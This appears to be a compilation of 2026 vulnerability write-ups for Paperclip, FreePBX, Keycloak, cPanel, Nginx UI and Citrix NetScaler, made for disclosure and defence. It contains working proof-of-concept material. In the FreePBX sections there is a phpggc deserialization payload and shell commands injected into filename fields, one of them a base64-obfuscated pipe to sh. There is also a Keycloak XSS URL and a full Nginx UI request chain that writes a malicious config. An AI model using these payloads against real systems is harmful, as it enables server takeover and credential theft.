Paperclip is an open-source platform for managing and coordinating teams of AI agents.
In practical terms, Paperclip is a Node.js server with a web UI that lets you create an AI “company” consisting of multiple agents (CEO, CTO, developers, researchers, marketers, etc.), assign goals, track work, enforce budgets, and review decisions

This vulnerability, with a CVE rating of 10, allows an unauthenticated attacker to take over a Paperclip server with only six API calls.
The full chain is described in this Github advisory.

I have submitted a Metasploit module that fully automates this attack.
There are around 700 Paperclip instances reported from a Shodan search so it is fortunately not very common in the Enterprise.
Please upgrade to 2026.410.0 or higher, preferable the latest release, to mitigate this vulnerability (NOTE: 2026.410.0 has already a fix).

References

CVE-2026-41679
Paperclip vulnerability disclosure
Metasploit Module – Paperclip unauthenticated RCE

Credits

Discovery –> Sagi Layani

An authenticated remote code execution (RCE) vulnerability exists in the FreePBX Backup & Restore module due to unsafe use of PHP’s unserialize() function on attacker-controlled data contained within a backup archive.
A low-privileged authenticated user with backup/restore permissions can upload a crafted backup file containing a malicious manifest file, resulting in arbitrary code execution on the FreePBX server.

Attack prerequisites

• Valid authenticated FreePBX user account
  
• Backup & Restore module enabled
  
• User has either:
  
  • Backup & Restore permission, or
    
  • Restore-only permission (restore-only role appears partially broken but still allows exploitation)
    

Root cause

During backup restore operations, FreePBX extracts selected files from a user-supplied tar archive.
If a file named manifest exists in the archive, it is read and passed directly to unserialize() without validation, class restrictions, or integrity checks.

if (file_exists($manafestfile)) {
    $manifestdata = file_get_contents($manafestfile);
    $tmpdata = unserialize($manifestdata);
    $meta = [
        'manifest' => $tmpdata
    ];
}

Because the archive contents are attacker-controlled, this enables PHP Object Injection, allowing gadget chains to achieve arbitrary code execution. Gadget chain tested: monolog/rce7 but others are likely viable such as swiftmailer/fw2, monolog/rce1, monolog/rce2, monolog/rce5, monolog/rce6 and guzzle/fw1.

Proof of Concept (PoC)

[1] Generate Malicious Manifest
Using phpggc to generate a Monolog RCE payload:

phpggc monolog/rce7 exec "touch /var/www/html/pawned" -o manifest

[2] Create Malicious Backup Archive

tar -cvzf evil_backup.tar manifest

(Additional required backup files may be included if validation checks exist.)

[3] Upload and Restore Backup

• Login to FreePBX Admin UI
  
• Navigate to Admin → Backup & Restore
  
• Upload evil_backup.tar.gz
  
• Unsafe deserialization sink hit which results in an RCE
  

[4] Result
The file /var/www/html/pawned is created, confirming arbitrary command execution during the restore process.

This issue is conceptually similar to:

• CVE-2014-7235 – FreePBX unsafe unserialize() leading to RCE
  
• Differs primarily in requiring authentication, but still results in full server compromise
  

Mitigation

FreePBX 16 (backup) < 16.0.71 are vulnerable. Please upgrade to version 16.0.71.
FreePBX 17 (backup) >= 17.0.0 < 17.0.6 are vulnerable. Please upgrade to version 17.0.6.

References

CVE-2026-26978
FreePBX vulnerability disclosure

Credits

Discovery –> h00die.gr3y@gmail.com

As we can see patch diffing, the vulnerability is in the error message display on the oauth/oob endpoint. While dorking I found the payload that was exposed by mistake:

http://localhost:8080/auth/realms/master/protocol/openid-connect/oauth/oob?error=%3Ca%20href=%22javascript%26%00colon;alert(document.domain)%22%3EReturn%20to%20application%3C/a%3E

More payloads can be extracted from the patch test suite at services/src/test/java/org/keycloak/theme/KeycloakSanitizerTest.java.

On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the cPanel & WHM and WP Squared products. CVE-2026-41940, the identifier subsequently assigned on April 29, 2026, has a CVSS score of 9.8. Exploitation permits unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems.

cPanel & WHM is web hosting control panel software used to manage websites and servers. WHM provides root-level administration, while cPanel acts as the user-facing interface. Successful exploitation of CVE-2026-41940 grants an attacker control over the cPanel host system, its configurations and databases, and websites it manages. A naive Shodan query for potential targets returns approximately 1.5 million cPanel instances exposed to the internet that may be vulnerable.

As of April 29, 2026, a technical analysis and proof-of-concept exploit have been published by security firm watchTowr. CVE-2026-41940 is an authentication bypass caused by a Carriage Return Line Feed (CRLF) injection in the login and session loading processes of cPanel & WHM.

Before authentication occurs, cpsrvd (the cPanel service daemon) writes a new session file to the disk. The vulnerability allows an attacker to manipulate the whostmgrsession cookie by omitting an expected segment of the cookie value, avoiding the encryption process typically applied to an attacker-provided value. Attackers can inject raw \r\n characters via a malicious basic authorization header, and the system subsequently writes the session file without sanitizing the data. As a result, the attacker can insert arbitrary properties, such as user=root, into their session file. After triggering a reload of the session from the file, the attacker establishes administrator-level access for their token.

I’ve rated Attacker Value as ‘Very High’, since cPanel is broadly exposed to the internet and facilitates valuable access to systems managed by it. I’ve rated Exploitability as ‘Very High’, since the vulnerability is a reliable logic bug in a web service that’s exploitable in the default configuration.

CVE-2026-33032 is a missing authentication bug affecting the ‘Nginx UI’ 3rd-party management tool for the Nginx web server; as a result of missing authentication controls, an unauthenticated attacker who exploits CVE-2026-27944 to leak backup information can access a Model Context Protocol (MCP) server that can perform privileged operations on managed Nginx web servers. Systems are vulnerable in the default IP allowlist configuration, which allows any remote IP to access MCP functionality. Exploitation of both vulnerabilities results in full attacker control of the managed Nginx service.

To exploit CVE-2026-27944, a remote attacker can perform a GET request to the path /api/backup, extract encryption keys returned in the header value for X-Backup-Security, then manually decrypt the AES-256-CBC encrypted backup in the response body. This process is easily facilitated using the proof-of-concept exploit present in the official vendor advisory.

The resulting decrypted materials include an app.ini file that contains a “node secret” value:

[...]
[node]
Name                 = 
Secret               = 6c8b49b3-1d34-4333-b8a1-2132634f99bd
SkipInstallation     = false
Demo                 = false
ICPNumber            = 
PublicSecurityNumber = 
[...]

This value is the only credential material required to authenticate to the /mcp API endpoint. When the correct key is provided in the node_secret parameter of a GET request to that path, a sessionId value is returned.

Request:

GET /mcp?node_secret=6c8b49b3-1d34-4333-b8a1-2172634f99bd HTTP/1.1
Host: 192.168.181.129:9000

Response:

HTTP/1.1 200 OK
[...]

event: endpoint
data: /mcp_message?sessionId=478a6095-af53-4a2b-a176-52bd49122eeb

This permits the attacker to perform a POST request to that endpoint with the provided sessionId value and invoke MCP functionality to load a new Nginx configuration on the managed Nginx instance. We’ll use the PoC provided by the official advisory to create an evil.conf configuration that logs tokens.

Request:

POST /mcp_message?sessionId=7b1ecc9e-a895-4265-9418-757dbba6f9d8 HTTP/1.1
Host: 192.168.181.129:9000
Content-Type: application/json
Content-Length: 391

{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "nginx_config_add",
    "arguments": {
      "name": "evil.conf",
      "content": "server { listen 8443; location / { proxy_pass http://127.0.0.1:9000; access_log /etc/nginx/conf.d/tokens.log; } }",
      "base_dir": "conf.d",
      "overwrite": true,
      "sync_node_ids": []
    }
  },
  "id": 1
}

Response:

HTTP/1.1 202 Accepted
[...]

Shelling into our Nginx UI Docker container, we observe the malicious changes have taken place, indicating full control over the managed Nginx server.

root@4739eddf3f2d:/etc/nginx# ls -ahtr conf.d/
nginx-ui.conf  ..  evil.conf  tokens.log  .

I’ve rated Attacker Value as ‘High’, since this is a very useful vulnerability in the context of a chain with CVE-2026-27944. I’ve rated Exploitability as ‘Moderate’, since exploitation requires some credential material (though it can likely be stolen using the backup leak on many affected installations of Nginx UI).

CVE-2026-3055 — Detection & Recon Analysis

1. Executive summary

2. Technical surface under test

The template issues up to four GET requests per target (first successful match stops further paths due to stop-at-first-match: true):

Redirects are limited (max-redirects: 2), which reduces drift onto unrelated pages while still allowing typical HTTPS redirects.

3. Matcher logic (Nuclei)

All of the following must hold (matchers-condition: and):

1. HTTP 200 — Only successful responses are considered. Errors, redirects that do not end in 200 on the tested URL chain, or auth walls that return non-200 will not match.

2. Content indicators (citrix-recon-indicators) — A word matcher on the response body with condition: or across:

   • <authMethods (GetAuthMethods),
     
   • process Assertion (WS-Fed/SAML processing),
     
   • <EntityDescriptor / IDPSSODescriptor (SAML metadata).
     

3. Product fingerprint (citrix-product-fingerprint) — A DSL matcher requiring at least one of:

   • Substrings in headers (nsc_, citrix, netscaler, authenticateresponse), or
     
   • Substrings in body (citrix, netscaler, explicitforms).
     

Why the DSL layer exists: A header-only fingerprint misses deployments that return valid body content without distinctive Server/Set-Cookie strings on that specific response. Combining body keywords with the recon strings above keeps the template closer to “Citrix federation surface” than to generic pages that merely mention “Citrix.”

Extractors pull ExplicitForms or SAML from the body for reporting; they do not affect matching.

4. Strengths

• Multi-path coverage reduces single-endpoint blind spots (e.g., metadata available when GetAuthMethods is locked down).
  
• Fingerprint OR logic in the DSL layer improves recall versus the previous header-only approach.
  
• References point to vendor remediation (CTX696300), supporting defensive prioritization.
  

5. Limitations and false signals

6. recon_poc.sh alignment

The script performs manual, low-impact checks aligned with the template’s first two paths:

• Default TARGET=127.0.0.1 to steer usage toward lab environments.
  
• Optional PROXY for traffic inspection (e.g., Burp) without hardcoding a third-party host.
  
• Warning when the target is not localhost.
  
• Explicit disclaimer that results are indicators only, not exploitability proof.
  

Operationally, the script is useful for validating that a lab NetScaler returns expected XML/snippet shapes before running fuller scanner workflows.

7. Defensive recommendations

1. Patch per CTX696300 on supported versions; treat matches as priority candidates for patch verification.
   
2. Reduce exposure: restrict management and federation endpoints where architecture allows; enforce TLS and monitoring on /cgi/* and federation paths.
   
3. Correlate scanner findings with asset inventory and IdP configuration (SAML vs WS-Fed vs LDAP-only) before treating a hit as production-critical.
   

8. Document scope

This analysis describes detection logic in this repository only. It does not reproduce exploit methodology, timing thresholds, or payload sizes. For authoritative vulnerability details, rely on Citrix publications and your organization’s security advisories.

info:
  name: Citrix NetScaler ADC/Gateway - Advanced SAML IdP & Recon Detection (CVE-2026-3055)
  author: Enoson Mathivannan(https://www.linkedin.com/in/enoson-mathivannan-636985121/)
  severity: critical
  description: |
    Detects Citrix NetScaler ADC and Gateway systems configured as a SAML Identity Provider (IdP) 
    by checking for both official metadata endpoints and active reconnaissance targets identified 
    in the wild. These configurations are vulnerable to CVE-2026-3055 (CitrixBleed 3).
  remediation: |
    Apply the security updates provided by Citrix in bulletin CTX696300 immediately. 
    Systems exposing these endpoints should be prioritized for patching.
  reference:
    - https://support.citrix.com/s/article/CTX696300
    - https://x.com/watchtowrcyber/status/2037629558375993639
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
    cvss-score: 9.3
    cve-id: CVE-2026-3055
    cwe-id: CWE-125
  metadata:
    max-request: 4
    product: netscaler_adc
    vendor: citrix
  tags: cve,cve2026,citrix,netscaler,saml,memory-leak,oob-read,recon

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi/GetAuthMethods"
      - "{{BaseURL}}/wsfed/passive"
      - "{{BaseURL}}/saml/idp/metadata"
      - "{{BaseURL}}/FederationMetadata/2007-06/FederationMetadata.xml"

    stop-at-first-match: true
    max-redirects: 2
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        name: citrix-recon-indicators
        words:
          - "<authMethods"                   # From /cgi/GetAuthMethods
          - "process Assertion"              # From /wsfed/passive (SAML signature)
          - "<EntityDescriptor"              # From SAML Metadata
          - "IDPSSODescriptor"               # From SAML Metadata
        case-insensitive: true
        condition: or

      # Header-only fingerprints miss many gateways; allow body hints (same request).
      - type: dsl
        name: citrix-product-fingerprint
        dsl:
          - "contains(tolower(all_headers), 'nsc_') || contains(tolower(all_headers), 'citrix') || contains(tolower(all_headers), 'netscaler') || contains(tolower(all_headers), 'authenticateresponse') || contains(tolower(body), 'citrix') || contains(tolower(body), 'netscaler') || contains(tolower(body), 'explicitforms')"

    extractors:
      - type: regex
        name: exposed-endpoint
        part: body
        regex:
          - "ExplicitForms"                  # Extracted from GetAuthMethods
          - "SAML"                           # Extracted from Metadata

On March 23, 2026, Citrix published a security advisory for a critical vulnerability affecting their NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) products. This vulnerability, CVE-2026-3055, which is classified as an out-of-bounds read and holds a CVSS score of 9.3, allows unauthenticated remote attackers to leak potentially sensitive information from the appliance’s memory. The Citrix advisory states that systems configured as a SAML Identity Provider (SAML IDP) are vulnerable, whereas default configurations are unaffected.

As of the advisory’s publication, there is no known in-the-wild exploitation and no public proof-of-concept (PoC) available. According to Citrix, the vulnerability was identified internally via security review. However, exploitation of CVE-2026-3055 is likely to occur once exploit code becomes public, since the affected software is broadly exposed to the internet. Customers running affected Citrix systems should remediate this vulnerability as soon as possible; Citrix software has previously seen memory leak vulnerabilities broadly exploited in the wild, including the infamous “CitrixBleed” vulnerability, CVE-2023-4966, in 2023.

I’ve rated ‘Attacker Value’ as ‘High’ and ‘Exploitability’ as ‘Medium’. These were chosen because the affected configuration is non-default and the difficulty of leaking sensitive materials is not yet established, while also taking into consideration that the affected software is broadly exposed to the public internet and has historically been a very popular target for attackers.

A command injection vulnerability exists in FreePBX.
User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server. The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.

Affected Products

• Product: FreePBX
  
• Module: System Recordings
  
• File:
 admin/modules/recordings/Recordings.class.php
  
• Function:
 function fixeRIFF($filename)
  

Tested Versions

• FreePBX 17.0.24
  
• FreePBX 17.0.25
  

Vulnerability Type

• OS Command Injection
  
• CWE-78: Improper Neutralization of Special Elements used in an OS Command
  
• Leads to Remote Code Execution (RCE)
  

Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).

Exploit Path

The FreePBX AJAX endpoint /admin/ajax.php exposes functionality from the System Recordings module.

Two AJAX commands are vulnerable:
[1] module=recordings&command=gethtml5
[2] module=recordings&command=convert

User-supplied POST parameters (e.g. file, filenames[]) are insufficiently sanitized and later passed into shell-executed operations via the Media handling subsystem. This allows command injection through crafted filename values..

Impact:
An attacker with access to the System Recordings module can:

• Execute arbitrary shell commands on the FreePBX server
  
• Write files to the web root
  
• Potentially escalate to full system compromise
  

This represents an escalation from module-level access to OS-level command execution.

Proof of Concept (PoC)

Endpoint 1 — gethtml5

POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&language=en&temporary[en]=0&filenames[en]=dummy.wav&command=gethtml5&module=recordings

Result:
File /var/www/html/pawned is created on the server.

Endpoint 2 — convert

POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&name=dummy&codec=wav&lang=en&temporary=1&command=convert&module=recordings

Result:
File /var/www/html/pawned is created on the server.

Root Cause

• Unsafe handling of user-controlled input used in file and media processing
  
• Command execution paths reachable via AJAX without sufficient sanitization
  
• Missing backend authorization enforcement for sensitive operations
  

The following code snippet shows the vulnerable code in file admin/modules/recordings/Recordings.class.php.
$filename is not sanitized and shell characters are not escaped.

        public function fixeRIFF($filename){
                exec("file -b $filename | grep 'RIFF' ", $out, $ret);
                if($ret === 0 ){
                        dbug(_("An error is occured on RIFF detection."));
                }
                if(empty($out[0])){
                        if (isset($_POST["name"]) && str_starts_with($_POST["name"], "custom/")) {
                                $f = str_replace("custom/", "", $_POST["name"]);
                        } else {
                                $f = str_replace("custom/", "", $_POST["file"]);
                        }
                        $cmd    = "mv ".$this->temp."/$f.wav $filename";
                        exec($cmd, $out, $ret);
                }
        }

Mitigation

FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.

References

CVE-2026-28287
FreePBX vulnerability disclosure

Credits

Discovery –> h00die.gr3y@gmail.com

A command injection vulnerability exists in FreePBX when using the ElevenLabs Text-to-Speech (TTS) engine. User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server.
The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.

Affected Product

• Product: FreePBX
  
• Module: System Recordings
  
• Driver: ElevenLabs TTS
  
• File:
 admin/modules/recordings/drivers/Elevenlabs.php
  
• Function:
 convertToAudio()
  

Affected Versions

• Confirmed on:
  
  • FreePBX 16 and 17
    
• Likely affects all versions where:
  
  • ElevenLabs TTS driver is present
    
  • convertToAudio() uses exec() without argument escaping
    

Vulnerability Type

• OS Command Injection
  
• CWE-78: Improper Neutralization of Special Elements used in an OS Command
  
• Leads to Remote Code Execution (RCE)
  

Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).

Root Cause

In convertToAudio(), user-controlled input $file is concatenated directly into a shell command without escaping:

$command = "ffmpeg -y -i ".$amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".MP3".
           " -acodec pcm_s16le -ac 1 -ar 44100 ".
           $amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".wav 2>&1";
exec($command, $output, $returnCode);

The $file variable originates from the POST parameter file_name and is not sanitized or escaped, allowing shell meta-characters (e.g., back-ticks) to be injected and executed.

Proof of Concept (PoC)

Payload (Base64-encoded to avoid file creation errors)

echo -n "touch /var/www/html/pawned" | base64

Result:
dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=

Injected payload:

echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh

Exploit Request
[1] First get an ElevenLabs API key (can be obtained from https://elevenlabs.io/app/developers/api-keys) after registration.
[2] Set the API key with the request below.

GET /admin/ajax.php?module=recordings&command=setapikey&engine=Elevenlabs&key=sk_REDACTED HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=<valid-session>

[3] Submit the exploit requests using a valid VoiceId that you can obtain from the response from the request above.

POST /admin/ajax.php?module=recordings&command=ttsConvert HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

engine=Elevenlabs&file_name=;`echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh`;&text=Cuckoo&voiceId=CwhRBWXzGAHq8TQ4Fs17&langCode=en

Result:
The command executes successfully and creates the file:
/var/www/html/pawned

This confirms arbitrary command execution on the FreePBX host.

Preconditions

• Valid FreePBX login
  
• Access to System Recordings module
  
• ElevenLabs API key configured (free tier sufficient)
  

Impact

• Remote Code Execution as the web server user (typically asterisk or www-data)
  
• Full compromise of the PBX system
  
• Potential lateral movement, call interception, credential theft
  

Mitigation

FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.

References

CVE-2026-28209
FreePBX vulnerability disclosure

Credits

Discovery –> h00die.gr3y@gmail.com